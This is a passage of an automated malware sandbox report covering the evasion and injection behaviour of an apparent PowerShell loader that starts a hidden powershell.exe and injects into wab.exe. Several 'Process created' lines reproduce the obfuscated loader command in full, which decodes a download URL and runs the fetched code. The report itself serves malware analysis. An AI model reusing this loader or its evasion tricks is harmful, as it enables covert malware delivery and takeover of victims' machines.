              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2730000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23190000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 25190000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6212Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3576Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7580Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2163Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 7067Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2719Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep count: 7580 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep count: 2163 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3180Thread sleep time: -23980767295822402s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4784Thread sleep count: 7067 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4784Thread sleep count: 2719 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: wab.exe, 0000000C.00000002.3362816569.0000000007758000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.3362816569.00000000077B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000003.00000002.2848754401.0000024C6F8E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04438398 LdrInitializeThunk,6_2_04438398
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_5092.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5092, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5144, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 273F8B4Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sulphuric = 1;$plethorous='sub';$plethorous+='strin';$plethorous+='g';function hdrede($blaastakkens){$preflood=$blaastakkens.length-$sulphuric;for($fstningsvrkers=5;$fstningsvrkers -lt $preflood;$fstningsvrkers+=6){$handelsstandsforenings251+=$blaastakkens.$plethorous.invoke( $fstningsvrkers, $sulphuric);}$handelsstandsforenings251;}function smrkers($scooch){& ($traguloidea) ($scooch);}$stikprop=hdrede 'hjlpemnvninoklip zbrothi uds ldagsbl f,rmakb.va/nices5woodb.monas0 r.fl ac.om(pladewsuffoi annon,loofddum,eo arbew kiloscarpo ronnfemi tkingp kloak1lfted0misst.monop0danto;ste i alg,rwo lsnilyksanmedio6skatt4anlgs;unomn overhx prer6 varm4nivea; pi,d pol trdegrevphth,:overj1brai.2 avar1.ands.friti0bedr.) hore skraag tutmesingacreseikg.ammomrk s/f.gtf2t.len0zenuw1smmom0pra.k0 ,ons1gldel0 etur1sw pl virgifmateritraa,r.riktesk laftitraoeriocx pre./no,il1dilet2tjrek1.esgs.l,sin0 wool ';$tudkoppernes=hdrede 'moneyufranksprecieda omrbanal- majoa lactg inapeundern ignt eca ';$loddendes=hdrede 'bela,hsambetbackhtspattpfornusfarve: exed/agerj/untanwhemi,wantemw dapi.preles,omitefo,brnscrold aswissin,lpmodbyas,mbicf yttemod.v. didecthu,do rivamst,tu/soldap dybhrhemogo rbe/unchrdgkkerl de,t/preafj.ostbjthrif4stinkutauriw a,st4 dyre ';$gainyield=hdrede 'pino,> orma ';$traguloidea=hdrede ' leeuiphiloecotylxbront ';$sogneprst='khediviah';$indlaes = hdrede ' ar.eeu derc parahdir yo ekss geogl% frdia lovtpdisorpfremtdsynf,a uropt kn.sa iara% i dp\te,esi mohanfolk.nfarmeusensimneur,etrster nazaasemi b barnlmutone swee.t,opps aandnmacr.ofanta ,nder&im.od&b adm urostefr,ntcacleiha.gosoelvte serietse in ';smrkers (hdrede 'histo$whispg taknl unr,o untrbforbra worklabsal: micrbgasrrodentagbi.enlrgerlr fortdesslie persssatch=d.gdr(sylfecbaha,mskambdtwadd ele/aft,ec ,ugh mis,m$serosi untenentomdtrforltendeadeporediktassnupp)spoer ');smrkers (hdrede ' valu$daimignonr l.egago,entebfe.icamo ndlsvvef:forvesov rto stndmprdikmsiwase offlrbl sdfniveaumislagbaronlg.evdeanatemn.ghto.ugledvenlieg wkilpopullzy,odekmninr,kabesfin.a=forst$n.triltagaso bio.d eos.dag icetransn.ankido gaveoutw sfanga.italisdirtbpmelitlederniforlst subs(amatr$sulfogbrndsa orgaipet onunlabyselvbima.isemayollalpetd dagd) ener ');$loddendes=$sommerfuglemodellers[0];$lngerevarig= (hdrede 'ironi$afsteganlgkloutseodadleb isotaindfalmaste:.kruep trkkydelberforniasjoven.noffoover,ikataldbipro= sug n minuetilenwfilib- ank,ounmanb aclujbogleefld,sc reg,t deba presosbelemys grnsskifttmagneelegitm udby.h.artnprofie moustoutbo. pa,twfragme skrib bertcritualhoggii aursedis,ensublit');$lngerevarig+=$boglrdes[1];smrkers ($lngerevarig);smrkers (hdrede 'bomol$sansapf.rveyst,deransteaperiknfejlno.lempiconcadballe.tilbyh lo iecorroa spildrampiebrisarudspesfremt[ utte$snkeltba,keukynu.ds ramkhelleo signpperspp lactebasbarb whon re,oedepetsorigi]ha,rs=.rese$tandgsmachetcladoia.stekskribpekster virko barnp g ne ');$emplanes=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sulphuric = 1;$plethorous='sub';$plethorous+='strin';$plethorous+='g';function hdrede($blaastakkens){$preflood=$blaastakkens.length-$sulphuric;for($fstningsvrkers=5;$fstningsvrkers -lt $preflood;$fstningsvrkers+=6){$handelsstandsforenings251+=$blaastakkens.$plethorous.invoke( $fstningsvrkers, $sulphuric);}$handelsstandsforenings251;}function smrkers($scooch){& ($traguloidea) ($scooch);}$stikprop=hdrede 'hjlpemnvninoklip zbrothi uds ldagsbl f,rmakb.va/nices5woodb.monas0 r.fl ac.om(pladewsuffoi annon,loofddum,eo arbew kiloscarpo ronnfemi tkingp kloak1lfted0misst.monop0danto;ste i alg,rwo lsnilyksanmedio6skatt4anlgs;unomn overhx prer6 varm4nivea; pi,d pol trdegrevphth,:overj1brai.2 avar1.ands.friti0bedr.) hore skraag tutmesingacreseikg.ammomrk s/f.gtf2t.len0zenuw1smmom0pra.k0 ,ons1gldel0 etur1sw pl virgifmateritraa,r.riktesk laftitraoeriocx pre./no,il1dilet2tjrek1.esgs.l,sin0 wool ';$tudkoppernes=hdrede 'moneyufranksprecieda omrbanal- majoa lactg inapeundern ignt eca ';$loddendes=hdrede 'bela,hsambetbackhtspattpfornusfarve: exed/agerj/untanwhemi,wantemw dapi.preles,omitefo,brnscrold aswissin,lpmodbyas,mbicf yttemod.v. didecthu,do rivamst,tu/soldap dybhrhemogo rbe/unchrdgkkerl de,t/preafj.ostbjthrif4stinkutauriw a,st4 dyre ';$gainyield=hdrede 'pino,> orma ';$traguloidea=hdrede ' leeuiphiloecotylxbront ';$sogneprst='khediviah';$indlaes = hdrede ' ar.eeu derc parahdir yo ekss geogl% frdia lovtpdisorpfremtdsynf,a uropt kn.sa iara% i dp\te,esi mohanfolk.nfarmeusensimneur,etrster nazaasemi b barnlmutone swee.t,opps aandnmacr.ofanta ,nder&im.od&b adm urostefr,ntcacleiha.gosoelvte serietse in ';smrkers (hdrede 'histo$whispg taknl unr,o untrbforbra worklabsal: micrbgasrrodentagbi.enlrgerlr fortdesslie persssatch=d.gdr(sylfecbaha,mskambdtwadd ele/aft,ec ,ugh mis,m$serosi untenentomdtrforltendeadeporediktassnupp)spoer ');smrkers (hdrede ' valu$daimignonr l.egago,entebfe.icamo ndlsvvef:forvesov rto stndmprdikmsiwase offlrbl sdfniveaumislagbaronlg.evdeanatemn.ghto.ugledvenlieg wkilpopullzy,odekmninr,kabesfin.a=forst$n.triltagaso bio.d eos.dag icetransn.ankido gaveoutw sfanga.italisdirtbpmelitlederniforlst subs(amatr$sulfogbrndsa orgaipet onunlabyselvbima.isemayollalpetd dagd) ener ');$loddendes=$sommerfuglemodellers[0];$lngerevarig= (hdrede 'ironi$afsteganlgkloutseodadleb isotaindfalmaste:.kruep trkkydelberforniasjoven.noffoover,ikataldbipro= sug n minuetilenwfilib- 